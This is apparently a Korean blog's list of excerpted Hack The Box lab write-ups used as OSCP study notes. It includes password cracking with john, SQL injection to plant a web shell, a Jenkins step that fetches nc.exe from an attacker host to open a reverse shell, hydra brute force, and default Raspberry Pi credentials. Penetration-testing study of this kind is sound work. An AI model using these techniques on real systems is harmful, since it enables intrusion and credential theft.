Elbrown

이 문제는 굉장히 어렵다.... OSCP 수준을 한참 넘어섰다고 본다. Node.js, mongodb에 대한 부분을 알 수 있어서 좋긴했다. User 플래그 따는건 인정, Root 플래그는 선넘었다 ㄹㅇ.... 인가 미흡에 따른 취약점, 계정 DB 정보가 노출된다. 자세히 안보면 놓치기 쉽다. /api/users /api/users/latest hash-identifier로 해쉬 값 확인 후 john 돌려주면 바로 비밀번호가 해독된다. john --format=Raw-SHA256 hash.txt 어드민 로그인을 하면 backup 파일을 받을 수 있다. Node.js 코어 코드인 app.js에 DB 암호가 저장되어 있다. >cat app.js const url = 'mongodb://mark:5AYRft7..

dns zone transfer 에서 단순히 도메인 게싱이 필요하다. 아무리 Enumeation을 하여도 도메인과 관련된 단서를 찾을 수 없었다. 결국 Writeup를 보았는데 도메인명을 다른 머신들을 풀었던 경험으로 때려맞추는 수 밖에 없다고한다. Enumeration으로 단서를 찾을 수 없는 문제는 타임컨슈밍을 유발한다. 푸는사람 의욕을 저하시키는 쓰레기같은 문제다. 루트쉘 따기까지는 어렵지 않다. SQL Injection bypass Command Injection Crontab exploit

배운점 1. 커널 익스는 메이저 버전만 일치하다면 Exploit 가능성이 있다. 그 이유는, searchsploit 검색 제목과 내용이 다른 경우가 있기 때문이다.. 제목은 2.6.37로 나와있지만, nelson.c 코드의 첫번째 줄을 보면 2.6.37 이하는 모두 해당된다고 나와있다. 3. 익스플로잇 코드 사용전에 잘 읽어보자. 컴파일 방법이 나와있다. 4. DB자체에서 보안성 강화를 위해 계정별로 명령어 제한을 걸 수 있다. outfile, load file 5. Enumeration은 필수, 숨겨진 디렉토리, 소프트웨어가 있다면 searchsploit을 검색하자 6. ssh key 방식 로그인을 추가하고 싶다면 유저의 홈디렉토리에 write 권한이 있어야한다. 7. 파일업로드 테스트시 큰 범주에서 ..

SQLInjection SQLI을 의도한건 문제인건 알았지만, 화면에 에러가 출력되지않아서 Blind인잭션을 사용해야 하는 줄 알았다. 블라인드는 스크립트가 아니면 상당히 오래걸린다. 따라서, sqlmap을 사용하였다. 몰랐던 사실 xxx.com?cod=-1 파라미터에 음수 또는 의도하지 않은 값을 입력하면 화면이 깨진다. 이 상태에서 union select 기법으로 출력되는 위치를 파악할 수 있었다. union으로 출력 메세지를 확인 가능하므로 load_file과 into outfile 기법을 사용하여 한줄 웹쉘을 생성하여 실행시킬 수 있다. Manual SQL Injection은 내 블로그에 정리 해둠 https://myreversing.tistory.com/306?category=870793 Lat..

Nmap Enumeration 옵션 --sC, --min-rate=1000 - 대상서버에 DNS 서비스가 실행되고 있다면 dns에 대해 Enumeration을 시도해야한다. - SSL인증서에 호스트 주소로 추정되는 값을 사용한다. commonName=friendzone.red This server open DNS server and also can find vhost name in commnName 53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ..

SolidState Port scan top포트 천개에 포함안된 경우 찾기 그냥 돌릴경우 시스템 과부화 문제로 응답이없거나 못찾는 경우가 있다. 이럴땐느 그냥 3000개 단위로 66000까지 빠르게 노가다하는게 좋을 수도 있다. rbash Escape 많은 방법이 있지만 그중에 하나 ssh @10.10.10.51 -t 'bash --noprofile' Enumeration Enumeration 스크립트를 써도 안나올 가능성이 있다. 수작업 명령어를 몇개 준비하는게 좋아보인다. nmap -p 6000-9000 -n -Pn IP -v -oN n3.txt 1번으로만 검색했었는데, 2번으로 검색해보니까 못 보던 결과를 찾을 수 있었음 1> find / -perm 4000 2>/dev/null 2> find / ..

Jeeves - 커널 권한상승 X (exploit 검색은 셜록이 제일 좋은 듯) - 키파일 찾아서 passthehash로 로그인 - dirb 브루트포스 포트: 80, 50000 Jenkins 페이지 /askjeeves - 딕셔너리에 단어가 없다면 cewl로 단어 추출해야함 - build 또는 scriptconsole로 커맨드 원격실행 nc -e 옵션 2020 칼리에 있는 nc의 경우 -e (쉘 실행)옵션이 설정이 필요함.. 잰킨스 build(windows batch command) kali: nc -lnvp 5555 잰킨스 build(windows batch command) Jenkins: powershell Invoke-WebRequest -Uri [kali ip]/nc.exe -Outfile nc.e..

* 리버스 쉘도 여러가지 방법이 있다. - basic이 안된다면 설치된 프로그래밍을 고려하여 다른 방법을 테스트 해보자. * sudo 사용을 통한 권한 상승 * 크론잡이 되는지 확인하는 방법? - 홈 디렉토리 체크 - 최근에 변경된 파일 확인 sudo를 사용해 사용 가능한 권한 sudo -l scriptmanager script 매니저로 변경 sudo -u scriptmanager 콘솔에서할 경우 sudo -u scriptmanager bash -i phpbash Using phpbash to gain a full shell is trivial. Simply using one of many connect-back commands or using phpbash to grab a Meterpreter sta..

Shocker - 이 문제는 쉘쇼크 문제 - 서버설정 잘 못됨 URL 퍼징시 /cgi-bin/ 가 403인걸 발견해야하는데 404를 받음 (write-up과 내용이 다르다) - 잘 안되면 그냥 공개된 write-up 보는게 낫겠다 싶다. - searchsploit의 코드가 형변환 등의 에러나서 수정해서 써야하는 경우도 있음 searchsploit -m 45939 * Exploit 코드에러 발생 => int 형변환 수정 root 존재 확인 hydra -l root -P /tools/rockyou.txt ssh://10.10.10.56:2222 -v -t 4 * SSH경우 thread 제한을 걸어두는걸 추천함 dirb를 사용한 write-up 확인해보기 lcesteves.wordpress.com/2019/0..

라즈베리파이(IOT) + 포렌식 문제 Nmap pihole 3.1.4 ftl 2.10 디폴트 패스워드 재사용(PI admin = SSH root 계정) SSH username:pi. password:raspberry. root.txt가 USB에 존재 마운트된 디스크 확인 df -h fdisk -l /medea/usbstick lost+found 디렉토리 확인 => 파일이 없어서 fsck 복구 어렵. 방법1 strings /media/usbstick 방법2 이미징, 복구 Method 2 - Imaging and Recovery The command sudo dcfldd if=/dev/sdb of=/home/pi/usb.dd will create an image of the USB stick and save..